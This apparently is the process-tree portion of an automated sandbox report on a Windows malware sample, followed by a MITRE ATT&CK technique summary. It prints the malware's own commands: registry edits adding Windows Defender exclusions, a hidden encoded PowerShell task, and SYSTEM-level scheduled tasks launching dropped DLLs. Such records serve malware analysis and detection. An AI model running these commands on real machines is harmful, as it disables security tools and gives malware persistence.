C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3568
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:7472
-
C:\Windows\system32\taskeng.exetaskeng.exe {A1A3734B-8059-4A6F-8531-2F8749D2FA4B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe nh /site_id 754 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3508 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjsdPAFWT" /SC once /ST 09:57:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:3568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjsdPAFWT"3⤵PID:7364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjsdPAFWT"3⤵PID:3168
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:323⤵PID:4484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:643⤵PID:4520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:323⤵PID:4556
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:643⤵PID:4728
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"3⤵PID:4616
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"3⤵
- Modifies data under HKEY_USERS
PID:4600 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:644⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:324⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:644⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:324⤵PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:644⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:644⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:324⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:324⤵PID:4900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:644⤵PID:4940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:324⤵PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:644⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:324⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:644⤵PID:5452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:324⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:644⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:324⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:644⤵PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵PID:5204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵PID:5224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:644⤵PID:5260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:324⤵PID:5284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:644⤵PID:5312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:324⤵PID:5348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:324⤵PID:5428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:644⤵PID:5404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:324⤵PID:5480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:644⤵PID:5448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:644⤵PID:5560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:324⤵PID:5568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:644⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:324⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:644⤵PID:5700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:324⤵PID:5736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:644⤵PID:5948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:324⤵PID:5600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:644⤵PID:5760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵PID:8204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵PID:8088
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 09:55:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe\" V8 /site_id 754 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"3⤵PID:5868
-
-
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe V8 /site_id 754 /S2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:5924 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"3⤵PID:6400
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:6112
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:6272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:6304
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:6368
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\XDReZe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\HPKwcBM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:5388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"3⤵PID:6684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"3⤵PID:6732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\treWaCh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\YwCwLnF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\TYmwRSM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\LIWceyB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:7092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 08:28:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll\",#1 /site_id 754" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:7312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hMZOFgVuABkGdcuhk"3⤵PID:7224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuuUmySUVfW" /SC once /ST 02:10:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe\" U4 /S"3⤵
- Creates scheduled task(s)
PID:7196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuuUmySUVfW"3⤵PID:7536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuuUmySUVfW"3⤵PID:7680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuuUmySUVfW"3⤵PID:7724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cbBtQoNpOByPPTwrn"3⤵PID:7760
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 7542⤵PID:7276
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 7543⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:7308 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"4⤵PID:1372
-
-
-
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3452
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\784B.tmp.exeC:\Users\Admin\AppData\Local\Temp\784B.tmp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3392
-
C:\Users\Admin\AppData\Local\Temp\8122.tmp.exeC:\Users\Admin\AppData\Local\Temp\8122.tmp.exe1⤵
- Executes dropped EXE
PID:7912
-
C:\Users\Admin\AppData\Local\Temp\8680.tmp.exeC:\Users\Admin\AppData\Local\Temp\8680.tmp.exe1⤵
- Executes dropped EXE
PID:7928
-
C:\Users\Admin\AppData\Local\Temp\8D06.tmp.exeC:\Users\Admin\AppData\Local\Temp\8D06.tmp.exe1⤵
- Executes dropped EXE
PID:7916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 6562⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:8004
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7980
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8060
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8076
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8116
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8140
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8364
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8420
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7268
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7124
-
C:\Windows\system32\taskeng.exetaskeng.exe {9B3B28DA-2C6B-4222-866A-ADF54BC696A2} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵PID:3704
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Suspicious use of SetThreadContext
PID:3688 -
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3916
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {91C5ACB5-0052-40A7-A804-3A4CDD5C7D96} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵PID:2620
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Suspicious use of SetThreadContext
PID:4376 -
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4396
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Browser Extensions
1Modify Existing Service
1Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Disabling Security Tools
2Impair Defenses
1Install Root Certificate
1Modify Registry
7Web Service
1